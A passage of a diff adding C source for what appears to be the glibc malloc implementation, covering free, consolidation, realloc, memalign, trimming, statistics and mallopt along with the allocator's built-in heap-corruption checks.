+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  const char *errstr = NULL;
+  int locked = 0;
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wrapps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    {
+      errstr = "free(): invalid pointer";
+    errout:
+      if (!have_lock && locked)
+        (void) mutex_unlock (&av->mutex);
+      malloc_printerr (check_action, errstr, chunk2mem (p), av);
+      return;
+    }
+  /* We know that each chunk is at least MINSIZE bytes in size or a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    {
+      errstr = "free(): invalid size";
+      goto errout;
+    }
+
+  check_inuse_chunk(av, p);
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might have let to a false positive.  Redo the test
+	   after getting the lock.  */
+	if (have_lock
+	    || ({ assert (locked == 0);
+		  mutex_lock(&av->mutex);
+		  locked = 1;
+		  chunk_at_offset (p, size)->size <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem;
+	      }))
+	  {
+	    errstr = "free(): invalid next size (fast)";
+	    goto errout;
+	  }
+	if (! have_lock)
+	  {
+	    (void)mutex_unlock(&av->mutex);
+	    locked = 0;
+	  }
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    set_fastchunks(av);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+    unsigned int old_idx = ~0u;
+    do
+      {
+	/* Check that the top of the bin is not the record we are going to add
+	   (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  {
+	    errstr = "double free or corruption (fasttop)";
+	    goto errout;
+	  }
+	/* Check that size of fastbin chunk at the top is the same as
+	   size of the chunk that we are adding.  We can dereference OLD
+	   only if we have the lock, otherwise it might have already been
+	   deallocated.  See use of OLD_IDX below for the actual check.  */
+	if (have_lock && old != NULL)
+	  old_idx = fastbin_index(chunksize(old));
+	p->fd = old2 = old;
+      }
+    while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);
+
+    if (have_lock && old != NULL && __builtin_expect (old_idx != idx, 0))
+      {
+	errstr = "invalid fastbin entry (free)";
+	goto errout;
+      }
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+    if (! have_lock) {
+      (void)mutex_lock(&av->mutex);
+      locked = 1;
+    }
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      {
+	errstr = "double free or corruption (top)";
+	goto errout;
+      }
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+      {
+	errstr = "double free or corruption (out)";
+	goto errout;
+      }
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      {
+	errstr = "double free or corruption (!prev)";
+	goto errout;
+      }
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (nextchunk->size <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      {
+	errstr = "free(): invalid next size (normal)";
+	goto errout;
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = p->prev_size;
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      unlink(av, p, bck, fwd);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink(av, nextchunk, bck, fwd);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	{
+	  errstr = "free(): corrupted unsorted chunks";
+	  goto errout;
+	}
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (have_fastchunks(av))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (! have_lock) {
+      assert (locked);
+      (void)mutex_unlock(&av->mutex);
+    }
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+
+  Also, because this routine needs to be called the first time through
+  malloc anyway, it turns out to be the perfect place to trigger
+  initialization code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+  mchunkptr       bck;
+  mchunkptr       fwd;
+
+  /*
+    If max_fast is 0, we know that av hasn't
+    yet been initialized, in which case do so below
+  */
+
+  if (get_max_fast () != 0) {
+    clear_fastchunks(av);
+
+    unsorted_bin = unsorted_chunks(av);
+
+    /*
+      Remove each chunk from fast bin and consolidate it, placing it
+      then in unsorted bin. Among other reasons for doing this,
+      placing in unsorted bin avoids needing to calculate actual bins
+      until malloc is sure that chunks aren't immediately going to be
+      reused anyway.
+    */
+
+    maxfb = &fastbin (av, NFASTBINS - 1);
+    fb = &fastbin (av, 0);
+    do {
+      p = atomic_exchange_acq (fb, NULL);
+      if (p != 0) {
+	do {
+	  check_inuse_chunk(av, p);
+	  nextp = p->fd;
+
+	  /* Slightly streamlined version of consolidation code in free() */
+	  size = p->size & ~(PREV_INUSE|NON_MAIN_ARENA);
+	  nextchunk = chunk_at_offset(p, size);
+	  nextsize = chunksize(nextchunk);
+
+	  if (!prev_inuse(p)) {
+	    prevsize = p->prev_size;
+	    size += prevsize;
+	    p = chunk_at_offset(p, -((long) prevsize));
+	    unlink(av, p, bck, fwd);
+	  }
+
+	  if (nextchunk != av->top) {
+	    nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	    if (!nextinuse) {
+	      size += nextsize;
+	      unlink(av, nextchunk, bck, fwd);
+	    } else
+	      clear_inuse_bit_at_offset(nextchunk, 0);
+
+	    first_unsorted = unsorted_bin->fd;
+	    unsorted_bin->fd = p;
+	    first_unsorted->bk = p;
+
+	    if (!in_smallbin_range (size)) {
+	      p->fd_nextsize = NULL;
+	      p->bk_nextsize = NULL;
+	    }
+
+	    set_head(p, size | PREV_INUSE);
+	    p->bk = unsorted_bin;
+	    p->fd = first_unsorted;
+	    set_foot(p, size);
+	  }
+
+	  else {
+	    size += nextsize;
+	    set_head(p, size | PREV_INUSE);
+	    av->top = p;
+	  }
+
+	} while ( (p = nextp) != 0);
+
+      }
+    } while (fb++ != maxfb);
+  }
+  else {
+    malloc_init_state(av);
+    check_malloc_state(av);
+  }
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  mchunkptr        bck;             /* misc temp for linking */
+  mchunkptr        fwd;             /* misc temp for linking */
+
+  unsigned long    copysize;        /* bytes to copy */
+  unsigned int     ncopies;         /* INTERNAL_SIZE_T words to copy */
+  INTERNAL_SIZE_T* s;               /* copy source */
+  INTERNAL_SIZE_T* d;               /* copy destination */
+
+  const char *errstr = NULL;
+
+  /* oldmem size */
+  if (__builtin_expect (oldp->size <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid old size";
+    errout:
+      malloc_printerr (check_action, errstr, chunk2mem (oldp), av);
+      return NULL;
+    }
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (next->size <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid next size";
+      goto errout;
+    }
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink (av, next, bck, fwd);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+              /*
+                 Unroll copy of <= 36 bytes (72 if 8byte sizes)
+                 We know that contents have an odd number of
+                 INTERNAL_SIZE_T-sized words; minimally 3.
+               */
+
+              copysize = oldsize - SIZE_SZ;
+              s = (INTERNAL_SIZE_T *) (chunk2mem (oldp));
+              d = (INTERNAL_SIZE_T *) (newmem);
+              ncopies = copysize / sizeof (INTERNAL_SIZE_T);
+              assert (ncopies >= 3);
+
+              if (ncopies > 9)
+                memcpy (d, s, copysize);
+
+              else
+                {
+                  *(d + 0) = *(s + 0);
+                  *(d + 1) = *(s + 1);
+                  *(d + 2) = *(s + 2);
+                  if (ncopies > 4)
+                    {
+                      *(d + 3) = *(s + 3);
+                      *(d + 4) = *(s + 4);
+                      if (ncopies > 6)
+                        {
+                          *(d + 5) = *(s + 5);
+                          *(d + 6) = *(s + 6);
+                          if (ncopies > 8)
+                            {
+                              *(d + 7) = *(s + 7);
+                              *(d + 8) = *(s + 8);
+                            }
+                        }
+                    }
+                }
+
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    { /*
+                Find an aligned spot inside chunk.  Since we need to give back
+                leading space in a chunk of at least MINSIZE, if the first
+                calculation places us at a spot with less than MINSIZE leader,
+                we can move to the next aligned spot -- we've allocated enough
+                total room so that this is always possible.
+                 */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          newp->prev_size = p->prev_size + leadsize;
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Don't touch corrupt arenas.  */
+  if (arena_is_corrupt (av))
+    return 0;
+
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      (void) mutex_lock (&ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      (void) mutex_unlock (&ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  /* Ensure initialization */
+  if (av->top == 0)
+    malloc_consolidate (av);
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      (void) mutex_lock (&ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      (void) mutex_unlock (&ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = ((_IO_FILE *) stderr)->_flags2;
+  ((_IO_FILE *) stderr)->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      (void) mutex_lock (&ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      (void) mutex_unlock (&ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  ((_IO_FILE *) stderr)->_flags2 |= old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  (void) mutex_lock (&av->mutex);
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      LIBC_PROBE (memory_mallopt_trim_threshold, 3, value,
+                  mp_.trim_threshold, mp_.no_dyn_threshold);
+      mp_.trim_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      break;
+
+    case M_TOP_PAD:
+      LIBC_PROBE (memory_mallopt_top_pad, 3, value,
+                  mp_.top_pad, mp_.no_dyn_threshold);
+      mp_.top_pad = value;
+      mp_.no_dyn_threshold = 1;
+      break;
+
+    case M_MMAP_THRESHOLD:
+      /* Forbid setting the threshold too high. */
+      if ((unsigned long) value > HEAP_MAX_SIZE / 2)
+        res = 0;
+      else
+        {
+          LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value,
+                      mp_.mmap_threshold, mp_.no_dyn_threshold);
+          mp_.mmap_threshold = value;
+          mp_.no_dyn_threshold = 1;
+        }
+      break;
+
+    case M_MMAP_MAX:
+      LIBC_PROBE (memory_mallopt_mmap_max, 3, value,
+                  mp_.n_mmaps_max, mp_.no_dyn_threshold);
+      mp_.n_mmaps_max = value;
+      mp_.no_dyn_threshold = 1;
+      break;
+
+    case M_CHECK_ACTION:
+      LIBC_PROBE (memory_mallopt_check_action, 2, value, check_action);
+      check_action = value;
+      break;
+
+    case M_PERTURB:
+      LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+      perturb_byte = value;
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+        {
+          LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+          mp_.arena_test = value;
+        }
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+        {
+          LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+          mp_.arena_max = value;
+        }
+      break;
+    }
+  (void) mutex_unlock (&av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM,
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
